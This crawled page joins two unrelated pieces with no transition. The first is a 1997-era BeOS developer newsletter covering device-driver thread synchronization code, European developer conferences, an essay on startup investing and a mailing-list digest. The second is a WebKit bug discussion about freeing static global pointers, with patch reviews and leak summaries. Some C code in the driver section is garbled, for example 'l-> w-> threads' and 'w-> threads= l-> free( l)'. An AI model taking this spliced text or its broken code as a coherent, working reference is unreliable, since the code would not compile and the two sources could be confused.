is TRUE. However, the return may be FALSE. In this case, a signal is pending. This could have arrived during the wsleep(), or some time before. When using acquire_sem_etc(), the BeOS will not allow a thread to block, or remain blocked, with a pending signal. For the good of the driver, the error must be propagated from wsleep(), and then out of the driver. All this occurs in the following code: struct wchan{ sem_id sem; struct wlink * threads; }; struct wlink { sem_id sem; struct wlink * next; }; void wacquire( struct wchan * w) { static spinlock l; sem_id sem; cpu_status ps= disable_interrupts( ); acquire_spinlock( & l); unless( w-> sem) w-> sem= create_sem( 1, "excluded"); release_spinlock( & l); restore_interrupts( ps); acquire_sem( w-> sem); } void wrelease( struct wchan * w) { release_sem( w-> sem); } bool wsleep( struct wchan * w) { bool b; struct wlink * l= malloc( sizeof * l); l-> sem= create_sem( 0, "waiting"); l-> w-> threads; w-> threads= l; release_sem( w-> sem); b= acquire_sem_etc( l-> sem, 1, B_CAN_INTERRUPT, 0); acquire_sem( w-> sem); return ( b== B_OK); } void wakeup( struct wchan * w) { struct wlink * l; while ( l= w-> threads) { release_sem( l-> sem); delete_sem( l-> sem); w-> threads= l-> free( l); } } The dev_control() should now be fully understandable. This article has illustrated some fairly sophisticated approaches to process synchronization, which should help writers of BeOS device drivers. There are multiple ways to coordinate threads, and to prevent corruption of data structures. The approach that a driver writer adopts will depend on the service being exported, and the particulars of the hardware. I wanted to give you all a synopsis of our European developer's conferences, which were held several weeks ago, and respond to some of our European developers' comments. Without further ado... There were two sites for the conferences, one in London and one in Frankfurt. The London conference was held at Planet Hollywood and was attended by about 40 developers. There was a small theater in the back of the building operated by a nice old guy named Reg. Reg's first comment was "Hey, I'll try to help, but I don't know anything about computers." I showed him the OS and the VideoMania demo, and he was literally walking about telling his co-workers "we need to get one of those boxes!" (It's nice to know there's still some unconquered minds out there!) Time seemed short in London, and Christophe had to drag me out of the building at the end. Computer Warehouse, a distributor of Macintosh clones, was there demonstrating a Tanzania-based clone in a dusty blue case called...the BE MACHINE! We had some problems with the keyboards, but once we cleared these up things went fine. The Frankfurt conference was held in a community center and was attended by about 60 developers. We had more time, and when the presentations were over, people began pulling out their Zip drives and doing some coding, trading ideas and files. PIOS, a German clone maker, was there displaying a machine that will eventually be able to boot 6 different operating systems, including the BeOS. The European developers in attendance were, on average, younger than their US counterparts. While optimistic, many were concerned about Be's direction. Many commented on things like the BeBox, GeekPort and database features of the original BeOS. They didn't so much think these were the most important features overall for the BeOS, but they definitely felt they were distinctive, and led them to investigate Be in the first place. The European developers seemed extremely technically- oriented, even as compared to their US counterparts. They have very technical schooling and really know the BeOS. However, they didn't seem as concerned with making money from their efforts as the US developers. One of the best things that came out of the conference is that I think many of the developers left with the realization that they could commercialize their products with some effort and some help from Be Europe. To the European developers: You have an incredible resource in the Paris office! They have a huge amount of experience and they want to help you commercialize your products. Please, contact them and let them help you. Speaking of contacting, many of the developers had questions and comments at the conference. Most of your comments I have already made known here at Be, and I have answers for many of your questions which I will begin emailing back to you this week. If you don't get a response before Boston MacWorld, send me a message at geoff@be.com. The business stuff aside, the mood and small sizes of the conferences made for two great parties. England and Germany, both known for good beer! I'd like to thank all of you who were there for making my trip so enjoyable, and I hope to see you all again soon! One of the measures of excellence that most software engineers are proud of utilizing is the "I stayed up this late" factor. Dude, I stayed up 'til 5am to get this nifty feature working!! I did that last night, and I proudly showed the fruits of my labors to my wife in the morning to which she responded, "Well, that's not very practical is it?" She was absolutely right, the feature I had implemented wasn't very practical, but it has sales appeal! You want a little sizzle with that steak? Man, you wouldn't believe how many Master's Awards entries we've seen in the last hours approaching the entry deadline. Now, I've been on the vanguard of a few emerging platforms in my day, and they objections come in waves. Something new... It will never work... Oh that thing, there's no software for it... It doesn't run Windows apps... The words are all too familiar, and all too often we in the herd blindly follow the beat of the Master drum without looking very closely at the veracity of the statements. Well, in my humble opinion, the BeOS is quickly approaching that critical mass point. We survive long enough, interesting software shows up, a cottage industry is born. I'm telling you, this software is hot! And new stuff is coming all the time. We've got music, lights, sounds, movies, spreadsheets, mail, paint, word processing. If you ask me, I think we're beginning to look lively. But let's not stop here. The BeDC is coming right quick, and if you're going you'll likely be able to see all this nifty stuff. We'll have a impromptu 3D contest, we're giving out machines, we're giving out disks, there will be dancing, singing, food, entertainment, and the Macintosh faithful. But before you go, have you ever considered how many infrared output devices exist in your world? I took a quick look around the office and found a keyboard, mouse, several TV and VCR controllers, and even a couple of PDA devices that do IRDA transfers. The funny thing about infrared is that you get to sit further away from the device you are controlling. Say, in the comfort of your living room chair, or on your bed, or what have you. It's pretty easy to train an infrared receiver to recognize when signals are coming from a particular device. So here's some more info on that prototype board that we're using to do IR. Insight Electronics 1-800-677-7716 Part: CDB8130 $200 (for two boards) This is one of those times when I say, just go out and buy this thing. What kind of a geek are you anyway? It's loads of fun, and when you figure out that you can go buy one of those infrared keyboards for about $80, you'll have no end of fun as to the evil you could do with it. So, to recount, we have lots of software, lots of nifty video thingies, lots of MIDI thingies, bunches of game-type thingies, accelerated 3D graphics. It's beginning to smell like soup. I think when our many thousands of magazine readers get their disks, they will be eager to buy software to play on their new toy. This is where we want to be. So before you head for Boston, do just one more compile knowing that there will be thousands of end-users who will be interested in your wares real soon now. Almost every day, we get mail from people interested in investing in Be. This is very flattering, we very much appreciate the sentiment it reveals, but law and common sense—they sometimes agree—dictate we decline. I can understand the interest: In the seventies, one of my colleagues at Hewlett-Packard and Data General, Bill Foster, started a company called Stratus; they made a non-stop computer system, roughly going after the same market as Tandem, a phenomenal success at the time. On the occasion of one of my trips to the East Coast, I called on Bill Foster and offered to put my savings in his company. He smiled, thanked me and declined very politely. I was very disappointed and, for a while, considered buying a McDonald's franchise in Paris. Fortunately, your opinion may vary, that didn't happen either and I decided I still loved computers after all. A decade and a half later, I finally invested in a start-up, Be Inc., and I now have a much better perspective on the wisdom of US securities laws and the reasons for the barriers they erect between professional investors and the rest of us. Investing early in a high-tech start-up looks enormously attractive. Compute the returns. Today, how much is $1,000 invested in the early Microsoft worth? Or Apple, or Intel, or SGI, or Oracle—the list is wonderfully long and interesting. It attests to the greatest, fastest, legal creation of wealth in the history of mankind around Sand Hill Road in Menlo Park, CA. That road is also known as VC Gulch for its high concentration of venture capital firms. How could one not want to get in at the ground floor and enjoy the ride? Well, there are the crashes. The roadsides of VC Gulch are littered with the carcasses of failed start-ups. Early stage high-tech companies are not good places to park college education or retirement money. Hardier individuals will object they know the risks and are willing to invest anyway: They're able and willing to put discretionary funds in play without endangering their or their family's future. In some very limited cases, the law allows individual investors to play in the same field as the pros. The restrictions are severe and involve, among other parameters, high requirements for the individual's net worth and education—and lots of paperwork. See your friendly securities attorney for details. There is more. Early stage companies have ambitious plans, they aim high. But software or ASICs take time, the rendez-vous in orbit with some other technology may or may not happen. For a number of reasons, the company you've invested in needs more time, more money. At this stage, professional investors make a decision: They put more money in the company, or they don't. If they do, or if new investors come in, they evaluate the "updated" opportunity offered by the company in a number of ways. If some pros decide not to put in more money, it means they see a higher risk and/or a lower reward than they like. As a consequence, the company has to offer better terms in order to make itself at least as attractive as other deals the pros could invest in. Practically, the share of the company owned by the earlier round investors shrinks to a smaller percentage, sometimes a much smaller one. This is still preferable to closing the business, so shareholders (including the founding employees) acquiesce. They see a potential in the business, they need money to actualize said potential, and they're willing to pay the price in reducing their percentage holding. The dilution is sometimes severe enough to be called "washing out." This is not a problem for investors who stay with the play and put money in the new round. They usually conserve their percentage of the company or pretty close to it, depending upon complex sets of terms in their initial investment. New investors also try to treat employees well by issuing new options, they need their commitment. So, assuming the company ultimately makes it, the only parties who really suffer in this process are the investors who don't play in the new round. If they are pros, washing out and being washed out is part of their everyday life. No hard feelings. They made a judgement call. For the "small," non-professional investor, re-investing may or may not be possible; being washed out might be perceived as an unfair experience, cautionary paperwork or not. That's where securities law and common sense agree in preventing normal people from playing with, or against, the pros. Who wants to bet money and play pick-up basketball against Michael Jordan or Dennis Rodman? And, no, I have no VC names in mind as I write:. An initial public interest suggestion—that all Be developers should buy the full-blown issue of the Preview Release rather than wait to get it for free—generated a lot of mail (and no objections). War stories were swapped ("...they all laughed when I sat down to my BeBox..."), and opinions on the blinking green lights exchanged (everybody seems to like them; one listener suggested that a BeBox-bezel clone to snap onto the front of the StarMax machine would be a great Christmas present). Ingmar Krusch fairly assessed the co-worker critic situation: “When someone laughs at my box, I turn the power off, back on, boot in 15 seconds, switch to 32 Bit resolution, open up 6 [QuickTime] movies and ask if their Pentium can do equal... [Of course] If they're not blown away by this and ask for real world applications, you should start improvising.” The thread was not without its nay-sayers. Jonathan Perret (a "believer" nonetheless, he assures us), answered Mr. Krusch's question: “You got a Millennium? As soon as I switch to 32-bit, all the redraws get very slow and ugly... Then I launch 6 QuickTime movies, the hard drive seeks like mad and renders the system nearly unusable—besides the fact that the movies are no longer at 25 fps. And besides, it's not *that* impressive. NT does it fine, in case you didn't know.” After the expected rebuttal, the thread opened a can of Pentium vs. PPC. Sit back, this one will probably be with us for awhile. An initial question about unblocking a semaphore-blocked thread turned into a wider discussion of signals after one of our readers suggested using send_signal() instead of suspend_thread(). Are signals evil, non-portable, and old-fashioned? Or are they the only way to design a modern multi-tasking kernel? Also, is there a difference between "thread safe" and "signal safe"? THE BE LINE: Contrary to a notion developed in this thread, suspend_thread() *does* work on a semaphore-blocked thread (the thread is immediately unblocked and suspended, as described in the Be Book). However, there *is* a bug on the resume side—if the suspend_thread() and resume_thread() calls are too close to each other, the resume is ignored. For now, stick a greater-than-3ms snooze between the calls (this is demonstrated in the Be Book in the snooze() description, but the snooze value is a bit on the low side.) As folks received their Preview Release CDs, they pointed out some of the rough edges, disagreed with some of the interface decisions, and made some suggestions (quoting from a variety of unnamed sources): Kaleidoscope: "When you resize the window to be tall enough, a slice at the bottom doesn't refresh properly." "Be seems to be measuring double-click intervals from mouse-down to mouse-down, rather than (IMHO correctly) mouse-up to mouse-down." "If you want the movies to play REALLY fast, here's a secret tip: Push down the Caps Lock key before starting them. " (from Jake Hamby of Be) NetPositive: "Open it up, resize it only horizontally and see the dirty trail the Location TextControl leaves behind." Tracker: "If you click on a file/folder name to edit it, the cursor stays in the I-beam "edit text" shape until you do it again." How do you treat an action that occurs "in the middle" of a series of undo/redo's? Should it be added to the end of the list, or inserted at the current position? Is it possible to store the action state as a tree (for undo, yes, but redo would be ambiguous). Also, it was suggested that Be needs a standard undo/redo key mapping. How about Alt-z/Alt-Z? Should this be user or app-settable? And where are those user interface guidelines? This led to a discussion of the "F<n>" keys—should they be used more often? As an example, Jon Ragnarsson suggested using an F<n> key to show/hide Replicators. Sander Stoks wrote in to ask about the transparent 32 bit bug—is it fixed in PR? The thread then became a discussion of how to manage windows that contain lots of views: Should you really have to "roll your own" views (by creating and managing rectangles yourself) in order to avoid the efficiency hit of multiple views? It was suggested that while it may be lamentable that BViews tend to become very slow when you throw a few dozen into a single window, this is simply the way of the Be world... Jon Watte: “The only alternative I can see is moving lots of stuff from the app_server into libbe.so, and have the app_server ONLY talk to BWindows, letting BViews be handled entirely on the client side. That would reduce communication, but would probably have other problems, since that's not the solution they chose.” Marco Nelissen: “You could do it the other way around... Ideally, you should be able to add your own modules to the app_server, which would then perform layout, drawing, or whatever else needs to be done fast.” Dianne Hackborn: “...there's no reason to put layout managers in the app_server: Since they typically don't interact with the user, they don't really need the capabilities of a BView; about the only app_server-related functions they need to work with are Draw(), FrameResized(), etc., and those all can be handled outside of transactions with the server, with little trouble.” So—why isn't the BView class faster? Where does the time go? Dianne Hackborn suggested that it's sunk by the amount of data that flows between the client and the server. Jon Watte says the amount of data doesn't matter—it's the communication overhead that's consumptive. So should multiple manipulations be bracketed by calls to BWindow's DisableUpdates() and ReenableUpdates() (in order to batch the commands)? Mr. Stoks' question never did get answered. THE BE LINE: The 32-bit transparency bug has been fixed (in PR).
http://www.haiku-os.org/legacy-docs/benewsletter/Issue2-30.html
crawl-001
refinedweb
4,259
69.82
For this enhancement we should keep in mind, that freeing statically allocated pointers takes time, which may delay the quit process. This may not be desired in standalone web browsers. However, sometimes it is good to free statically allocated pointers but this method should not have a performance impact when it is disabled. Created attachment 34058 [details] First draft patch (In reply to comment #1) > Created an attachment (id=34058) . - StdLibExtras.h is overwritten to support these pointers - Since heap.destroy() must be called for JSGlobalData before delete, I created a new derived class, because template specialization created multiple definitions for StaticPtr<JSGlobalData>::free() (See JSDOMWindowBase.cpp -> commonJSGlobalData()) - I am sure this patch should be cut to multiple parts. Do you have any suggestions for this? - Some destructors are only defined, but never implemented. Why? (~ImageLoadEventSender(), ~FontCache()) - And an iteresting observation: some AtomicStrings are defined as const, and some are not, but all of them seems like fixed strings. Should we change all of their type to "const AtomicString"? This patch works with Qt port nicely (after some fixes). I have grave doubts about the ability of this to work for all static pointers. In particular I think the global static AtomicStrings in HTMLNames will cause problems. Before seeing something like this go in I'd want to see it work for all the global statics and know that it wouldn't be a maintenance burden to keep it working when new ones are added or the order of them changed, etc. I think enabling/disabling static pointer destruction should also be controllable by a runtime option as well (once enabled with the compile-time option). if I remember correctly, Mac OS X's "leaks" tool, correctly ignores static pointer leaks. Can't valgrind do the same? with DEFINE_STATIC_LOCAL we even put them all into a custom section, which should make them super-easy to ignore. ;) (In reply to comment #4) I think this would be an easy feature since WTF::StaticPtrBase::freeStaticPtrs() must be called from the code itself. With a runtime option we can easly prevent the call of this function. (In reply to comment #5) The problem is with the transitive allocations. Valgrind does not track the use of 'this' pointers. Let A be a static object, and it allocates a B object, which also allocates a C object. A()->B()->C() In this case valgrind cannot see that B and C are belongs to the A object, and report them as memory errors. Perhaps it would be too time consuming to detect these situations. Comment on attachment 34058 [details] First draft patch I think it's a good idea to make our globals more consistent. But probably not such a great idea to start what could be a massive project without a good idea how we'll keep test this and keep it working as each global is added. Is the goal here to make memory leak debugging tools work better? Or is there value beyond that?? As part of this are you proposing that DEFINE_STATIC_LOCAL be the only legal way to make. An excellent economy in the project at the moment is that we don't try to write all the deallocation code for all the global objects. > wtf/RefCountedLeakCounter.cpp \ > wtf/TypeTraits.cpp \ > + wtf/StaticPtr.cpp \ > wtf/unicode/CollatorDefault.cpp \ I believe this is supposed to be in alphabetic order, so it should come before TypeTraits.cpp. > +#include "config.h" > + > +#include "StaticPtr.h" Extra blank line here. > + StaticPtrBase() { > +#if ENABLE(FREE_STATIC_PTRS) > + m_next = head(); > + m_head = this; > +#endif > + }; Extra semicolon here. I think this would might read better if the inline implementation was outside the class definition since it has an #if in it. There's no reason we have to have the ifdef in here. But a better alternative would be to just leave out the constructor definition entirely when FREE_STATIC_PTRS is not enabled. If there are no constructor definitions then the class automatically will have an empty default constructor which is what we want. > + StaticPtr(PtrType ptr) : StaticPtrBase(), m_ptr(ptr) { }; > + StaticPtr() : StaticPtrBase(), m_ptr(0) { }; > + ~StaticPtr() { }; No need to explicitly initialize StaticPtrBase since there are no constructor arguments. Extra semicolons here. No need to explicitly declare the destructor -- this is the same as the compiler-generated constructor and it's much better style to not declare it. > + PtrType operator=(PtrType); This seems like bad style. Since values stored in this pointer will be freed, I think we want this to use some explicit style like OwnPtr rather than plain assignment. > + ValueType& operator=(ValueType&); This seems quite strange. Why do we need to allow assignment to the pointer of a non-const pointer of value type? This seems very dangerous, since the value type will later be destroyed. > + PtrType operator&(); > + PtrType operator&() const; Do we need this operator? What coding style is going to require this? > + // Condition operators > + bool operator!(); Should be const. Please look at OwnPtr for some ideas on how to make this class work. This should be much closer to OwnPtr which has exactly the same semantic. > +protected: I believe these members should be private, not protected. > +#if !PLATFORM(QT) > delete data; > +#endif This seems clearly wrong. Did you mean this to be a FREE_STATIC_PTRS ifdef? > + StaticGlobalData() : WTF::StaticPtr<JSGlobalData>() { }; This constructor is entirely unnecessary. > +protected: Should be private, not protected. > +#if ENABLE(FREE_STATIC_PTRS) > + virtual void free() { > + m_ptr->heap.destroy(); > + delete m_ptr; > + } > +#endif Incorrect brace style here. > +ALWAYS_INLINE JSGlobalData* StaticGlobalData::operator=(JSGlobalData* value) > +{ > + m_ptr = value; > +} Seems poor to use plain assignment of a raw pointer for an operation that transfers ownership. > - return globalData; > + return &globalData; This line of code seems wrong. You want a JSGlobalData*, not a StaticGlobalData*. This is a poor use of operator overloading. review- for now based on the specific problems with the patch, but I do also have project-direction concerns here, although I am not using reviewer power to try to enforce those. (In reply to comment #8) > (From update of attachment 34058 [details]) > I think it's a good idea to make our globals more consistent. Thank you! > But probably not such a great idea to start what could be a massive project > without a good idea how we'll keep test this and keep it working as each global > is added. Totally agree. It is not my custom to submit a patch in such draft phase, but I feel this project is more about finding a way to define globals which everyone _likes_, than the actual code itself. I know this is risky, may never be a successful project, but it is worth a try, isn't it? :) I will fix typos and answer to all your questions tomorrow. Once again, thank you for your detailed feedback! (In reply to comment #8) > (From update of attachment 34058 [details]) >. Being able to "reset" WebCore to its pre-cached-local-statics state would be useful for the iPhone OS port. We don't care about tearing down objects when exiting a process, but being able to clear out the cached static variables on-demand would be useful. Created attachment 34131 [details] Second draft patch Unfortunately there are several ways to define global variables, I don't think it is possible to merge them into a single preprocessor define: - using DEFINE_STATIC_LOCAL * creates static global variables inside a function * the object is created before the first call of the function - using DEFINE_GLOBAL (WebCore/platform/StaticConstructors.h) * these variables cannot be freed, since they are allocated on the heap * workaround: wrapper classes Any better idea? * fortunately it is a rarely used directive (only two classes: AtomicString and QualifiedName) - Plain global variables [static] class* [class_name::]variable; * I will try to use a static alayzer tool to find these objects * my propose: use '[static] WTF::StaticPtr<class> [class_name::]variable;' instead of them in the future WTF::StaticPtr similar to OwnPtr, except: - only one object can be assigned to it. The object can be passed to the constructor, or assigned later. > Is the goal here to make memory leak debugging tools work better? Or is there > value beyond that? Ok, you win here :) tonikitoo and ddkilzer mentioned they could use this feature. I also plan to use it for embedded devices, but first I would like to know whether it is possible to do it. But right know they are just plans, nothing more. >? "WTF::StaticPtr<class>" would be a substitution of "class*", and it would mimic the default C++ pointer behaviour as possible (with operator overloading). I hope "class&" definitions are rare except for DEFINE_STATIC_LOCAL. > As part of this are you proposing that DEFINE_STATIC_LOCAL be the only legal > way to make global variables? No. DEFINE_STATIC_LOCAL has a special purpose, and looks like not cover all. Well I think a global policy can be: - either do not write destructors (someone else can do later) - or write a working, and tested constructor. > > +#if !PLATFORM(QT) > > delete data; > > +#endif This delete cause a segmentation fault in Qt. It has not appeared until now, since this destructor is never called. (Although this code may have worked, when the destructor was implemented, but it was not covered by regression tests, and has gone wrong eventually). I think if we write a destructor, we have to maintain it as the other codes, and should cover them in regression tests. This may be a good aim for this project. I have fixed the typos and other things (the looks much better now), except: > > + PtrType operator=(PtrType); > > This seems like bad style. Since values stored in this pointer will be freed, I > think we want this to use some explicit style like OwnPtr rather than plain > assignment. Could you show me an example here? Anyway, a plain QtLauncher now frees 761 objects (without crash). After some browsing it grows to 812. (In reply to comment #12) > - using DEFINE_GLOBAL (WebCore/platform/StaticConstructors.h) > * these variables cannot be freed, since they are allocated on the heap > * workaround: wrapper classes > Any better idea? > * fortunately it is a rarely used directive (only two classes: AtomicString > and QualifiedName)) Adam, if you really want I can stop this task. I don't want to force anything if you don't like it. (In reply to comment #14) > >) I see your second patch is special casing them, but it is not deleting them as you are not explicitly calling the destructor you are just deleting them as normal. > Adam, if you really want I can stop this task. I don't want to force anything > if you don't like it. No, feel free to continue I just have doubts that this method of dealing with it will be robust enough to deal with the stated goal without encuring a lot of new requirements. Created attachment 34265 [details] Third patch The whole thing is in much better shape. I hope you will like it. In general I don't really like this idea. Ripping things down during quit is only useful for leak debugging. On Mac OS X we've not had this trouble with our leak debugging tools to my knowledge. I'm sad that we would have to jump through hoops for valgrind. But maybe I'm missing something obvious. Darin Adler is likely your best bet for a reviewer. He's still the best source for approval on such large sweeping changes. The man has more c++-fu in his pinky finger than all of me does. ;) Created attachment 34549 [details] Fourth patch Actually WebCore is much better written than I expected, so uniforming the constant pointer handling is not that hard. After starting and quiting from QtLauncher, the leak reduced from: ==18154== LEAK SUMMARY: ==18154== definitely lost: 66,632 bytes in 496 blocks. ==18154== possibly lost: 25,536 bytes in 7 blocks. ==18154== still reachable: 241,690 bytes in 5,595 blocks. ==18154== suppressed: 0 bytes in 0 blocks. Number of loss records: 295 To: ==6905== LEAK SUMMARY: ==6905== definitely lost: 344 bytes in 2 blocks. ==6905== indirectly lost: 20 bytes in 1 blocks. ==6905== possibly lost: 744 bytes in 3 blocks. ==6905== still reachable: 117,418 bytes in 2,859 blocks. ==6905== suppressed: 0 bytes in 0 blocks. Number of loss records: 131 And 50k from this space is a debug structure used by StructureID-s. Is there a specified webkit name pattern for global variables? In this patch, I've seen both "foo" (same as local variables) and "gFoo". I use "g_Foo" in my code, but Eric says it's wrong. So what pattern should be used for global variables? (In reply to comment #20) > Is there a specified webkit name pattern for global variables? In this patch, > I've seen both "foo" (same as local variables) and "gFoo". I use "g_Foo" in my > code, but Eric says it's wrong. So what pattern should be used for global > variables? correction: should be "g_foo" Comment on attachment 34549 [details] Fourth patch > +#include "wtf/StaticPtr.h" Includes of wtf from WebCore use angle brackets. <wtf/StaticPtr.h>, not "wtf/StaticPtr.h". > +static WTF::StaticPtr<JSGlobalData> sharedInstancePtr;. A major reason this patch is unacceptable is that this creates many global objects with destructors. I didn't review further because that's a major problem with the current version. >. I have realized why DEFINE_STATIC_LOCAL (probably DEFINE_GLOBAL is even better example, which use placement new to hide the destructor) defined, so the destructor of WTF::StaticPtr is empty of course, and never intended to do anything... (In reply to comment #23) > I have realized why DEFINE_STATIC_LOCAL (probably DEFINE_GLOBAL is even better > example, which use placement new to hide the destructor) defined, so the > destructor of WTF::StaticPtr is empty of course, and never intended to do > anything... Please check and see what the compiler generates for this before giving a patch that deploys it in tons of places. I'm pretty sure that an empty virtual function will indeed generate a static destructor, although a pointless empty one. There's a good chance it will even change the virtual pointer on the object. Anyway, if the technique works that's fine but it's pointless to review a patch to deploy the technique before you've tested it! (In reply to comment #2) > (In reply to comment #1) > > Created an attachment (id=34058) ... (In reply to comment #25) > (In reply to comment #2) > > (In reply to comment #1) > > > Created an attachment (id=34058) [details] ... correction: atexit pushes the destructor to the onexit stack A branch had been set up on gitorius where I tried to extend the patch(es) for all statics: git@gitorious.org/~balazs/qtwebkit/balazs-clone/commits/free-static-ptrs. Actually it is tested only in interpreter mode (DEFINES='ENABLE_JIT=0 ENABLE_YARR_JIT=0' at the end of the build-webkit ... command line) of JSC because I had some problems with JIT. Created attachment 38848 [details] Fifth patch Sorry for my long silence, I was away on Holiday. From the start of this week I am back again and has rewritten most of the core parts of the patch. Global pointers are changed to structures (these structures are allocated on .bss (according to objdump). They are simple C structures -> no constructors or destructors are called (tested by gdb)). Now every structure has an own separate file () The new files are: - contains a C struct create mode 100644 JavaScriptCore/wtf/GlobalPtr.h - contains a C++ class create mode 100644 JavaScriptCore/wtf/LocalStaticArrayPtr.h - contains a C++ class create mode 100644 JavaScriptCore/wtf/LocalStaticPtr.h - freeing static variables create mode 100644 JavaScriptCore/wtf/StaticPtrBase.cpp - contains a C struct create mode 100644 JavaScriptCore/wtf/StaticPtrBase.h There is no inheritance, since a struct is converted to class if inheritance applied (was strange for me, but it is true). Instead StaticPtrBase must be the first member of its descendants. The descendants must not contain any virtual method (to avoid vptr). Darin, could you take a look at the patch, please. I had a qestion on webkit-dev about whether should I unifying the names of global variables along this work. What is your opinion?? (In reply to comment #29) > I had a qestion on > webkit-dev about whether should I unifying the names of global variables along > this work. What is your opinion? I think it's best to do renames separately. I'm always tempted to do such things together and it tends to make patches harder to review, and if there is a problem later, more conflicts and difficulty rolling a change out. (In reply to comment #30) > > You say "sometimes it is good to free statically allocated pointers". When? One case is that webkit is used as a dll, and the dll can be loaded and unloaded multiple times. Those global pointers will leak in this case. But I guess an OwnPtr or something should be good for this purpose. The dtors will be called when the dll is unloaded. Also there is a c_exit or _cexit in MSVC to explicitly call all dtors for global/static objects. When constructing a global object, the compiler will add the dtor to the exit stack with atexit. So the order of destruction is reverse order of construction. and explicitly calling c_exit() also clears the stack, so no need to worry about the problem of calling dtor twice. Is there a compiler that doesn't guarantee this? ENABLE(FREE_STATIC_PTRS) is good for not affecting people who don't want to use it. But GlobalPtr must be freed by explicit call to deletePtr(). That's not an easy life. Considering a coding guideline that requires using same macros for global objects. What are the goals? 1. construct and destruct global objects in safe order 2. ability to free all memory allocated by global pointers 3. ability to leave those global pointers as leaks. We can just define a GlobalPtr same as OwnPtr, except there's a compile-time switch for deleting the object in destructor or not. That would be simple but enough for most ports I guess. (In reply to comment #32) > One case is that webkit is used as a dll, and the dll can be loaded and > unloaded multiple times. Is there someone who wants to use WebKit this way? Is the global variable issue the only issue preventing this? I think the project to make it so you can load and unload WebKit multiple times is a pretty big project. And we should not do it unless we have to. (In reply to comment #33) > (In reply to comment #32) > > One case is that webkit is used as a dll, and the dll can be loaded and > > unloaded multiple times. > > Is there someone who wants to use WebKit this way? Yes. for example, webkit is used to render html page in other applications, like a COM object provider, or other ways. > Is the global variable issue the only issue preventing this? > I think the project to make it so you can load and unload WebKit multiple times > is a pretty big project. And we should not do it unless we have to. There may be other resources to consider, but those static global pointers are hard to be explicitly freed outside of WebCore. Loading/unloading webkit dll multiple times is fine except the leaks. (In reply to comment #30) >? Perhaps this patch will be destined as an experimental solution. The big qestion is: whether it is possible to make WebKit to an unloadable dll / shared object. The answer is unknown at this moment, since noone tried it before, so noone will start to consider this as an option because they feel this is a too risky project. We just close the way before an interesting feature without trying it. First, I try to sort all global variables into groups. How globals are declared and used in WebKit. Is there a redundant form, or all of them are necessary (now I have only 3 groups). Second, are the globals handled correctly. Some globals are change their value, and we must make sure (in debug mode) their previous value is freed. Right now I found only one exception to the reversed free order: WebCore::pageCache() is allocated too early in QtLauncher (using setMaximumPagesInCache), and its destructor frees a timer object. The calling of timer::stop() causes segmentaion fault at that time. I don't insist on the current form of global handling. If all globals are declared as templates, anyone can change their behaviour (and make GlobalPtr to a class if someone prefers that way). The patch really helps to valgrind: a simple QtLauncher start-exit process left around 300k leak, and this is reduced to 100k. The number of loss records decreased from 400 to 100. It is much easier to find real leaks from that 100 loss records (especially because the remaing loss records are belongs to font config and Qt internals). There is one really good news: the work started 1.5 monts ago, and I had no trouble upgrading it to the most recent version so far. Looks like maintaining of this patch is not a hard work (hopefully). Created attachment 39334 [details] Sixth patch Just a regular update. Many new pointers are freed now. Comment on attachment 39334 [details] Sixth patch I really dislike the direction this is going. Adding many new classes and lots of complexity. And lots of code that won't compile in most platforms, so will cause platform-specific build failures. I don't think this is worth it. > +#include "wtf/GlobalPtr.h" Includes of wtf should be: #include <wtf/GlobalPtr.h> I think GlobalPtr should probably be named GlobalOwnPtr and have an interface as close as possible to the OwnPtr class, since it's a sort of hybrid between OwnPtr and a raw pointer. > +WTF::GlobalPtr<JSGlobalData> sharedInstancePtr; Items in the WTF namespace are supposed to have "using WTF::GlobalPtr" in the header and not be qualified by WTF explicitly in code. I don't understand why it's better to move the actual pointer outside of a function. It still seems a good programming style to scope a global variable inside a function when that's possible. > +#include "wtf/FastMalloc.h" > +#include "wtf/StaticPtrBase.h" Need to use angle brackets for these includes. > +// All HashTables are static and generated by a script (see the comment in the header file) Need a period at the end of this sentence. > +struct HashTableDeleter { > +public: No need for "public" since this is a struct. A struct where everything is public should omit the public: part. > + WTF::StaticPtrBase m_base; No WTF:: prefix. > + HashTable* m_hashTable; > + > + static void free(void* ptr) > + { > + reinterpret_cast<HashTableDeleter*>(ptr)->m_hashTable->deleteTable(); This should be a static_cast, not reinterpret_cast. > +#if ENABLE(FREE_STATIC_PTRS) > + HashTableDeleter* deleter = reinterpret_cast<HashTableDeleter*>(fastMalloc(sizeof(HashTableDeleter))); This should be a static_cast, not a reinterpret_cast. Why use fastMalloc here and not new? > +// The classes here are defined as structs to avoid > +// the call of C++ constructors and destructors This comment and technique is incorrect. Using the keyword "struct" instead of "class" has no effect on the presence of C++ constructors and destructors. There are only two differences between class and struct: 1) Default visibility is public for struct, private for class. 2) Visual Studio treats struct and class as distinct for type identity and name mangling. This goes against the C++ standard, but requires that we be consistent if we want compatibility with that compiler. Otherwise, they are identical and struct vs. class has no effect on whether something has a non-trivial constructor and destructor. > + // Has NO C++ constructor The terminology here is strange. Why say "C++" when all this code is C++? The comments in this file are not clarifying what this class is for. They need to say that it's intended to be used for global data. And to satisfy our requirement that there be no global destructors in the WebKit projects if FREE_STATIC_PTRS is not set, they must have no non-trivial destructor. And to satisfy our requirement that there be no global constructors in the WebKit projects they must have no non-trivial constructor. Some of that needs to be said. > + void set(PtrType); > + void setPtr(PtrType); I have no idea how set differs from setPtr. Does not seem to be good design to have both, but perhaps there is some real difference here. If so we need to use a more descriptive name. For example, in other places we use terms like "adopt". Somehow I guess setPtr means "take this pointer value, but not ownership". And if so, it seems very strange design to have a pointer that sometimes owns what it points to, and other times does not. Seems like overkill to have that. If it's not going to own something, then we can use a raw pointer. > + void operator=(PtrType); And also have an = operator. Why have all three of these? > + void deletePtr(); What is this for? > +#if ENABLE(FREE_STATIC_PTRS) > + StaticPtrBase m_base; > +#endif This makes every global pointer 8 bytes. Is this really the best we can do? > + delete reinterpret_cast<GlobalPtr<T>*>(ptr)->get(); This should be a static_cast, not reinterpret_cast. > + void setFree(StaticPtrBaseFree func) The type name StaticPtrBaseFree is not so good, because "free" is a verb or adjective, not a noun. Types normally should be nouns. Instead of "func" please use "function". There's no need to abbreviate. Except in certain cases where something needs to be > + // Detect memory leaks > + ASSERT(!m_ptr || (m_ptr == value)); The comment here is confusing. How does this comment "detect memory leaks"? I think it's strange to have this function allow you to set the same value multiple times, given that the set operation is really "give ownership". Why do we need that flexibility? I think the set function should probably be named "adopt" if it is taking ownership. > +template<typename T> > +ALWAYS_INLINE void GlobalPtr<T>::operator=(PtrType value) Do we really need this? I think assignment is confusing when it transfers ownership of a raw pointer, so it would be best to leave this out unless it's 